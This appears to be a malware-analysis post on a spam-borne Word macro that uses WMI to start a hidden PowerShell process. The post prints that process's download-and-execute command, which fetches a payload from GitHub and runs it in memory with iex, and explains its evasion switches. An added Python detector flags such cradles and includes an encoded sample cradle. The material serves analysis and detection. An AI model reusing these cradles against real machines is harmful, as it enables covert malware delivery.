Macro-Malware Connecting to GitHub


Just yesterday McAfee Labs reported macro malware hiding its payload in text forms. That same day we found a sample fetching its payload from GitHub.

As usual the attack starts with a spam email with the attachment named:

<organization name>’s_Overdue Invoice_(007-153315).doc

A reasonably convincing name: it is not a generic one like invoice_confirmation.doc but carries the target organization's own name, so some recipients may well open it.

The document has the following structure:

[Image: document structure (2016-03-08-001-doc_structure)]

And here is a relatively short Visual Basic macro we found inside:

[Image: the macro (2016-03-08-002-macro)]

It uses the WMI Scripting Library to start the process, and the code that launches PowerShell (lines 7-13 of the macro) appears to be lifted from the Windows Dev Center sample and lightly obfuscated. Launching through WMI has a side effect worth knowing for detection: the new powershell.exe is created by the WMI provider host (WmiPrvSE.exe), not by the Office process, so a rule that only looks for Word spawning PowerShell directly will miss it. Here is the command line:

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c if ([IntPtr]::size -eq 4) {(new-object Net.WebClient).DownloadString('https://github.com/consfw/msfw/raw/master/README') | iex } else {(new-object Net.WebClient).DownloadString('https://github.com/consfw/msfw/raw/master/TODO') | iex}"

It starts PowerShell with switches chosen to keep the execution as quiet as possible: -ExecutionPolicy Bypass (no script policy checks, so no warnings or prompts), -WindowStyle Hidden (no console window), -noprofile (no profile scripts, and with them nothing an administrator may have put there), and -noexit (the host stays resident after the command completes). Note that the execution policy is not a security boundary; anyone who can start powershell.exe with arguments can bypass it, so the switch is useful as a detection indicator but not as a control.

Let’s have a better look at the actual script passed to PowerShell:

if ([IntPtr]::size -eq 4) {
    (New-Object Net.WebClient).DownloadString('https://github.com/consfw/msfw/raw/master/README') | iex
} else {
    (New-Object Net.WebClient).DownloadString('https://github.com/consfw/msfw/raw/master/TODO') | iex
}

The condition checks whether the script is running in a 32- or a 64-bit process: according to MSDN, [IntPtr]::Size is 4 in a 32-bit process and 8 in a 64-bit one, so the script picks the payload matching the bitness of the PowerShell host it was spawned in. The chosen file is fetched with the DownloadString method of the WebClient class, and the returned text is piped into iex, the alias of Invoke-Expression, so the payload runs in memory without being written to disk as a file.

What’s interesting is that the payload was stored on GitHub. At the time of analysis the repository had already been deleted. An internet search showed that someone else had noticed it too and submitted the URLs to urlquery.

Hiding the payload on GitHub is an easy way to add a little stealth. How effective it is against AV/HIPS/NIDS is hard to say, but the download is an HTTPS connection to a reputable site, and any proxy or web filter that allows github.com for developers allows it for the malware as well, so there is a fair chance it gets overlooked.
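As an added example, not code from the original post or from Bromium, here is a Python triage routine for process-creation command lines that covers what the sections above describe: the quiet-execution switches, the DownloadString | iex cradle with its bitness branch, and a GitHub URL as payload host. It also canonicalises PowerShell's abbreviated switch forms (-ep, -w, -nop, -enc) and decodes -EncodedCommand, because a signature on the long switch names alone is trivially evaded. The indicator names, the CODE_HOSTS list and the second and third sample command lines are assumptions made for the example; only the first sample is the command line from the post.

```python
"""Triage PowerShell command lines for the download-and-execute cradle above.
Added example, not code from the original post. Input is a process-creation command
line (e.g. the CommandLine field of Security event 4688 or Sysmon event 1)."""
import base64
import re
from dataclasses import dataclass, field

# powershell.exe accepts documented short forms and any unambiguous prefix of a
# switch ("-ep bypass", "-w hidden", "-nop"); canonicalise before matching.
SWITCHES = {"ExecutionPolicy": ("ex", "ep"), "WindowStyle": ("w",), "NoProfile": ("nop",),
            "NonInteractive": ("noni",), "NoExit": ("noe",), "NoLogo": ("nol",),
            "EncodedCommand": ("e", "ec", "enc"), "Command": ("c",)}
DOWNLOAD_RE = re.compile(r"downloadstring|downloadfile|downloaddata|net\.webclient|"
                         r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b", re.I)
EXEC_RE = re.compile(r"\biex\b|invoke-expression|\[scriptblock\]::create|invoke-command", re.I)
URL_RE = re.compile(r"""https?://[^\s'"()\[\];]+""", re.I)
# Analyst-chosen list (an assumption for this example): reputable hosts that blend in.
CODE_HOSTS = {"github.com", "raw.githubusercontent.com", "gist.github.com", "gist.githubusercontent.com"}

@dataclass
class Triage:
    is_powershell: bool = False
    switches: dict = field(default_factory=dict)   # canonical switch -> value ("" if none)
    script: str = ""                               # decoded script text, if any
    urls: list = field(default_factory=list)
    indicators: list = field(default_factory=list)

    @property
    def suspicious(self):
        # A lone hygiene switch such as -NoProfile is normal; the cradle is what matters.
        return "download-and-execute cradle" in self.indicators or len(self.indicators) >= 3

def canonical_switch(token):
    """'-ep', '-Exec', '-ExecutionPolicy' -> 'ExecutionPolicy'; None if unknown or ambiguous."""
    name = token.lstrip("-").lower()
    for full, short in SWITCHES.items():
        if name == full.lower() or name in short:
            return full
    prefixed = [full for full in SWITCHES if full.lower().startswith(name)]
    return prefixed[0] if len(prefixed) == 1 else None

def decode_encoded_command(b64):
    """-EncodedCommand carries the script as base64 of UTF-16LE text."""
    try:
        return base64.b64decode(b64.strip("\"'"), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""

def host_of(url):
    m = re.match(r"https?://([^/:?#]+)", url, re.I)
    return m.group(1).lower() if m else ""

def triage(cmdline):
    t, tokens = Triage(), cmdline.split()
    if not tokens or not re.fullmatch(r'"?(?:.*\\)?(?:powershell|pwsh)(?:\.exe)?"?', tokens[0], re.I):
        return t                                   # not a PowerShell host
    t.is_powershell, i = True, 1
    while i < len(tokens):
        tok = tokens[i]
        if not tok.startswith("-"):                # bare argument: script text starts here
            t.script = " ".join(tokens[i:])
            break
        sw = canonical_switch(tok)
        if sw == "Command":                        # the rest of the line is the script
            t.switches[sw], t.script = "", " ".join(tokens[i + 1:])
            break
        if sw == "EncodedCommand":
            t.switches[sw] = ""
            t.script = decode_encoded_command(tokens[i + 1]) if i + 1 < len(tokens) else ""
            break
        if sw in ("ExecutionPolicy", "WindowStyle") and i + 1 < len(tokens):
            t.switches[sw] = tokens[i + 1].lower()
            i += 2
            continue
        t.switches[sw or tok.lower()] = ""         # valueless or unknown switch
        i += 1
    t.urls = URL_RE.findall(t.script)
    checks = [
        ("execution policy bypassed", t.switches.get("ExecutionPolicy") in ("bypass", "unrestricted")),
        ("hidden window", t.switches.get("WindowStyle") in ("hidden", "1")),
        ("profile suppressed", "NoProfile" in t.switches),
        ("encoded command", "EncodedCommand" in t.switches),
        ("download-and-execute cradle", bool(DOWNLOAD_RE.search(t.script) and EXEC_RE.search(t.script))),
        ("payload chosen by process bitness", bool(re.search(r"\[intptr\]::size", t.script, re.I))),
        ("payload hosted on code-sharing site", any(host_of(u) in CODE_HOSTS for u in t.urls)),
    ]
    t.indicators = [name for name, hit in checks if hit]
    return t

# Constructed samples: the command line from the post; the same cradle with abbreviated
# switches and -EncodedCommand (placeholder URL); an ordinary scheduled-task invocation.
SAMPLE_POST = ("powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c "
               "if ([IntPtr]::size -eq 4) {(new-object Net.WebClient).DownloadString("
               "'https://github.com/consfw/msfw/raw/master/README') | iex } else {(new-object "
               "Net.WebClient).DownloadString('https://github.com/consfw/msfw/raw/master/TODO') | iex}")
SAMPLE_ENCODED = "powershell -nop -w hidden -ep bypass -enc " + base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/example/repo/master/stage2.ps1')"
    .encode("utf-16-le")).decode("ascii")
SAMPLE_BENIGN = "powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File C:\\scripts\\backup.ps1"
```

The block only defines functions and samples; call triage() on command lines from your process-creation logs and act on .suspicious and .indicators. The github.com/<user>/<repo>/raw/... links in the post redirect to raw.githubusercontent.com, which is why both hosts are in CODE_HOSTS; treat that list as a starting point, since any host your developers are allowed to reach is reachable by a macro as well.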
